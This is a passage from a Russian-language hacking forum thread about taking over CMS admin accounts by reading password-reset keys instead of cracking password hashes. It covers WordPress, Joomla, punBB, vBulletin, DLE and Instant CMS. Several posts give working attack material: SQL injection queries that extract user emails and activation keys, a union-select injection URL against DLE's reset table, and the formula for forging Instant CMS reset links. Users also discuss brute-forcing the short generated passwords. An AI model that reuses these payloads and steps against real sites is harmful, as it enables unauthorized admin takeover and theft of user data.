Авторские статьи Получаем доступ в админку Wordpress без расшифровки хэша

Discussion in 'Статьи' started by MaxFast, 7 Nov 2012.

  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Ааааааа, ну зачем-зачем-зачем ты спалил!!

    с 1.7 в базе код восстановления хеширован.
     
    #21 попугай, 8 Nov 2012
    Last edited: 8 Nov 2012
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    ну раз с WP раскрылась тема то и до джумлы доберутся)
    вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$"
    на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!

    форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confirm
     
    _________________________
    2 people like this.
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Так 100 лет можно брутить хэш.
     
    _________________________
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Короче походу все мои исследования, что я по ретриву проводил пора выкидывать в мусорку... Дальше так и пойдёт....
     
    _________________________
    2 people like this.
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    раньше открытые были, потом пофиксели с какойто версии.
     
    _________________________
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    продолжу тему раз уж нато пошло

    форум punBB 1.3.4

    PHP:
    select+substr(concat_ws(0x3a,id,username,email),1,99)+from+forum_users+limit+1,1
    получаем

    идём на страницу востановления пароля

    PHP:
    http://сайт.ру/forum/login.php?action=forget
    вводим емеил, далее

    PHP:
    select+substr(concat_ws(0x3a,id,activate_key),1,99)+from+forum_users+limit+1,1
    получам

    далее меняем пароль

     
    2 people like this.
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Тогда можно переименовать тему, и посвятить ее способам на других CMS.
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
     
    _________________________
    1 person likes this.
  9. Sergeynia

    Sergeynia New Member

    Joined:
    15 Aug 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Да можно создать тему
     
  10. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    может не стоит?) захэшируют же все))
     
  11. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    переносите тему в ветку уязвимости.

    BigBear'у теперь некогда этим заниматься, а тема не должна затеряться.
     
  12. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Способ так-же подходит для VB - при восстановлении устанавливается новый 8-ми символьный цифровой пароль, который сбрутить не составит труда, хэши в ссылке на восстановление не используются.

    Потом хэш можно вернуть на изначальный, только вот письмо из почты админа никуда не денется, хотя возможно в других двигах есть свои нюансы.
     
    #32 randman, 11 Jan 2013
    Last edited: 11 Jan 2013
  13. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Версию не уточнял!
    DLE:

    1) http://site/?do=lostpassword (via email)
    2) use bug:

    http://site/script.php?video=-49674'+union+select+1,2,lostid,4,5,6,7+from+dle_lostdb+where+lostname='1'--+

    В данном случае, lostname - это ID пользователя - обычно админ


    3)переход по линку:
    http://site/index.php?do=lostpassword&action=password&douser=1&lostid=a05e0f74df705f0a1e3ab0803f82a7fd046214d5

    4) Генерится 11 символьный пароль из loweralpha и digit. Причем, есть шанс, что сгенеренный пароль будет only 11 digit's

    P.S Лично у меня 11 lenght DIGIT simblols EGB обходит перебором за пару минут.






    Instant CMS v1.9

    CСсылка формируется согласно шаблону:

    Query -
    SELECT *, DATE_FORMAT(logdate, '%d-%m-%Y-%H-%i-%s') as logdate FROM cms_users WHERE email = 'email' LIMIT 1

    Непосредственно вычисление хеша:
    $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate']);


    В результате прямой линк на сброс пароля принимает вид:

    http://site/registration/remind/bbd4da8d02433a6bdea3d3019458f951

    Далее в форме вводим новый пароль:подтверждение.

    P.S. В stable что лежит на офф сайте код в алгоритм формирования ссылки в конец добавляется константа PATH ( $_SERVER['DOCUMENT_ROOT'])

    Like this:
    $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate'].PATH);
     
    #33 Cennarios, 19 Jan 2013
    Last edited: 25 Jan 2013
    1 person likes this.
  14. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    wp 3.4.2. прокатило
     
  15. ninja96c

    ninja96c New Member

    Joined:
    29 Sep 2010
    Messages:
    8
    Likes Received:
    3
    Reputations:
    1
    WP 3.9.1 и выше (может и ниже) - ключ активации хешируется.
    20 символов [a-zA-Z0-9] - проще хеш админа подобрать...
     
    VitalyKuz likes this.